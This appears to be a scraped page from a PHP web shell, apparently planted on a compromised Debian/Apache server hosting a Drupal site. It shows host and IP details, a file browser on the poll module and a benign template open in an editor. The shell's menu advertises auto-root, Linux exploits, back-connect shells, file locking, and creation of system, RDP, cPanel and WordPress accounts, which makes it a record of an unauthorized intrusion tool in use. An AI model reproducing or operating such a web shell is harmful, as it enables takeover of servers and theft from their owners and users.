Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.136.18.192
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
poll /
[ HOME SHELL ]
Name
Size
Permission
Action
poll-bar--block.tpl.php
709
B
-rw-r--r--
poll-bar.tpl.php
775
B
-rw-r--r--
poll-results--block.tpl.php
822
B
-rw-r--r--
poll-results.tpl.php
789
B
-rw-r--r--
poll-rtl.css
134
B
-rw-r--r--
poll-vote.tpl.php
797
B
-rw-r--r--
poll.css
809
B
-rw-r--r--
poll.info
344
B
-rw-r--r--
poll.install
5.94
KB
-rw-r--r--
poll.module
30.08
KB
-rw-r--r--
poll.pages.inc
3.05
KB
-rw-r--r--
poll.test
33.46
KB
-rw-r--r--
poll.tokens.inc
2.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : poll-vote.tpl.php
<?php /** * @file * Default theme implementation to display voting form for a poll. * * - $choice: The radio buttons for the choices in the poll. * - $title: The title of the poll. * - $block: True if this is being displayed as a block. * - $vote: The vote button * - $rest: Anything else in the form that may have been added via * form_alter hooks. * * @see template_preprocess_poll_vote() * * @ingroup themeable */ ?> <div class="poll"> <div class="vote-form"> <div class="choices"> <?php if ($block): ?> <div class="title"><?php print $title; ?></div> <?php endif; ?> <?php print $choice; ?> </div> <?php print $vote; ?> </div> <?php // This is the 'rest' of the form, in case items have been added. ?> <?php print $rest ?> </div>
Close